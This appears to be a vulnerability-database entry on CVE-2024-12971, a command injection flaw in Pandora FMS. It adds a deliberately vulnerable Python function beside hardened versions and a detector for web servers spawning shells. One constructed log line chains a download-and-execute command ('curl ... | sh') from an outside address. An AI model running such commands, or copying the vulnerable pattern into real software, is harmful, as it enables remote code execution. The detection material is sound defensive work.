Cyber Posture

CVE-2024-12971

Severity: High

Published: 17 March 2025
Modified: 16 September 2025
KEV Added: (none recorded)
Patch: (none recorded)
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.8315 (99.3rd percentile)
Risk Priority: 67 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Description

CVE-2024-12971 is an OS command injection vulnerability (CWE-77, Improper Neutralization of Special Elements used in a Command) in Pandora FMS. An authenticated user with low privileges can, over the network and without any user interaction, make the server execute arbitrary operating-system commands.

Security Summary

CVE-2024-12971 is an Improper Neutralization of Special Elements used in a Command vulnerability (CWE-77) in Pandora FMS that allows OS command injection: input from an authenticated user reaches an operating-system command without being neutralised, so shell metacharacters in that input run as additional commands on the server. The affected range is given here as versions 700 to 777.6; the Affected Products record below lists 777.8 as the upper bound, so confirm the first fixed release against the vendor advisory rather than relying on either figure alone.
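The pattern described above, as an added example that is not code from Pandora FMS or from this page: a command built by string concatenation and handed to a shell, beside the neutralised form (no shell, allowlist validation). The hypothetical "target" parameter and the inputs are constructed, and "echo" stands in for whatever command the real application runs so the block is safe to execute anywhere with a POSIX shell.

```python
"""Added example, not code from Pandora FMS or the page: the CWE-77 pattern
behind CVE-2024-12971 beside a neutralised version. The 'target' parameter
and the inputs are constructed; 'echo' stands in for the real command so the
block runs safely wherever a POSIX shell exists."""
import re
import subprocess

# Characters the POSIX shell treats as operators, quoting or expansion.
# Any of them in an untrusted value that reaches a shell string is a finding.
SHELL_META = re.compile(r"[;&|`$<>\n\r\\'\"(){}\[\]*?~]")

# Allowlist for the one shape this hypothetical parameter should have: a
# hostname or IP label. A leading '-' is excluded so the value cannot be
# read as an option by the command it is passed to.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def is_injection_attempt(value: str) -> bool:
    """Detection-side check: does the value carry shell metacharacters?"""
    return SHELL_META.search(value) is not None


def run_vulnerable(target: str) -> str:
    """CWE-77: untrusted input is spliced into a command string that a shell
    parses (shell=True). Everything after ';' runs as a second command."""
    cmd = f"echo {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv_only(target: str) -> str:
    """First layer of the fix: no shell. The value is one argv element, so
    ';', '|' and '$(...)' are inert bytes handed to the program."""
    return subprocess.run(["echo", target], capture_output=True, text=True).stdout


def run_hardened(target: str) -> str:
    """Second layer: allowlist validation before the value is used at all,
    then the argv form. Rejecting early also stops option injection."""
    if not HOSTNAME_RE.fullmatch(target):
        raise ValueError(f"rejected target: {target!r}")
    return run_argv_only(target)


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("flagged:    ", is_injection_attempt(payload))
    print("vulnerable: ", repr(run_vulnerable(payload)))   # second command ran
    print("argv only:  ", repr(run_argv_only(payload)))    # payload is one argument
    try:
        run_hardened(payload)
    except ValueError as err:
        print("hardened:   ", err)
    print("hardened ok:", repr(run_hardened("monitor-01.example")))
```

The argv form alone already defeats the injection; the allowlist is there because a value that is never meant to contain a metacharacter should be rejected at the boundary, which also gives you a clean log line to alert on. Escaping with a quoting helper is a weaker third option, since it has to be applied on every path and is easy to miss on one.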

The vulnerability carries a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). The vector says the attack is reachable over the network (AV:N) with low complexity (AC:L), needs only a low-privileged account (PR:L) and no user interaction (UI:N), and stays within the scope of the Pandora FMS server (S:U) while giving high impact on confidentiality, integrity and availability (C:H/I:H/A:H) through arbitrary OS command execution on that server. In practice PR:L means any account that can log in is enough, so the exposed population is every user who can authenticate, not just administrators.

Mitigation details are available in the vendor advisory at https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/.

Details

CWE(s)
CWE-77: Improper Neutralization of Special Elements used in a Command ("Command Injection")

Affected Products
Vendor: artica
Product: pandora fms
Versions: 700 through 777.8

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1059.004 Unix Shell (Execution)
Adversaries may abuse Unix shell commands and scripts for execution.

Why these techniques?

The flaw is an OS command injection in a network-accessible web application, so a successful exploit is an Exploit Public-Facing Application event (T1190) wherever the Pandora FMS console is reachable by the attacker, and the injected payload is run by the server's Unix shell, which is Unix Shell execution (T1059.004). Detection therefore has two natural hooks: anomalous requests to the application, and the web server's worker process spawning a shell.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
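A detection for the post-exploitation shape these two techniques describe, as an added example that is not part of the page or of Pandora FMS: process-creation events are scanned for a web-server worker spawning a shell, and the shell's command line is checked for chaining operators. The event schema, host and process names, and the log lines are all constructed for the example; a real deployment would read the same fields from auditd, an EDR or Sysmon for Linux.

```python
"""Added example, not from the page: detect a web worker spawning a shell
(T1190 followed by T1059.004) over constructed process-creation events.
The JSON schema, process names and sample lines are assumptions."""
import json
import re

# Processes that serve the web application (assumed names for the example).
WEB_WORKERS = {"httpd", "apache2", "php-fpm", "nginx"}
SHELLS = {"sh", "bash", "dash", "zsh"}
# Shell operators that chain, pipe or substitute a second command. A single
# legitimate shell-out from the app will not contain these.
CHAIN_RE = re.compile(r"(;|\|\||&&|\||\$\(|`)")

# Constructed events in an EDR-like JSON-lines schema (assumed). pid 4120 is
# the web worker; 4188 is a plain shell-out, 4201 carries a chained payload,
# 4250 is a chained command from a non-web parent, 4260 is not a shell.
SAMPLE_EVENTS = """\
{"ts":"2025-03-17T10:01:02Z","host":"pandora01","pid":4120,"ppid":1,"comm":"httpd","cmdline":"/usr/sbin/httpd -DFOREGROUND"}
{"ts":"2025-03-17T10:01:05Z","host":"pandora01","pid":4188,"ppid":4120,"comm":"sh","cmdline":"/bin/sh -c ping -c 1 10.0.0.5"}
{"ts":"2025-03-17T10:02:11Z","host":"pandora01","pid":4201,"ppid":4120,"comm":"sh","cmdline":"/bin/sh -c ping -c 1 10.0.0.5;curl http://198.51.100.7/x|sh"}
{"ts":"2025-03-17T10:03:00Z","host":"pandora01","pid":4250,"ppid":900,"comm":"sh","cmdline":"/bin/sh -c logrotate /etc/logrotate.conf && systemctl reload rsyslog"}
{"ts":"2025-03-17T10:04:00Z","host":"pandora01","pid":4260,"ppid":4120,"comm":"php","cmdline":"/usr/bin/php /var/www/cron.php"}
"""


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: list) -> list:
    """Return one finding per shell whose parent is a web worker. Severity
    is raised when the shell command line chains a second command."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["comm"] not in SHELLS:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or parent["comm"] not in WEB_WORKERS:
            continue  # shells from cron, ssh etc. are out of scope here
        chained = CHAIN_RE.search(e["cmdline"]) is not None
        findings.append({
            "ts": e["ts"],
            "host": e["host"],
            "pid": e["pid"],
            "parent": parent["comm"],
            "cmdline": e["cmdline"],
            "severity": "high" if chained else "medium",
            "techniques": ["T1190", "T1059.004"],
        })
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{f['ts']} {f['host']} [{f['severity']}] {f['parent']} -> pid {f['pid']}: {f['cmdline']}")
```

A monitoring product shells out as part of normal operation, so the medium finding (web worker starts a shell with a single command) is a baseline signal to tune against known-good command lines rather than an alert on its own; the high finding (operators chaining a download and a second shell) is what an exploit of this CVE looks like from the process tree, and should page regardless of baseline.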

References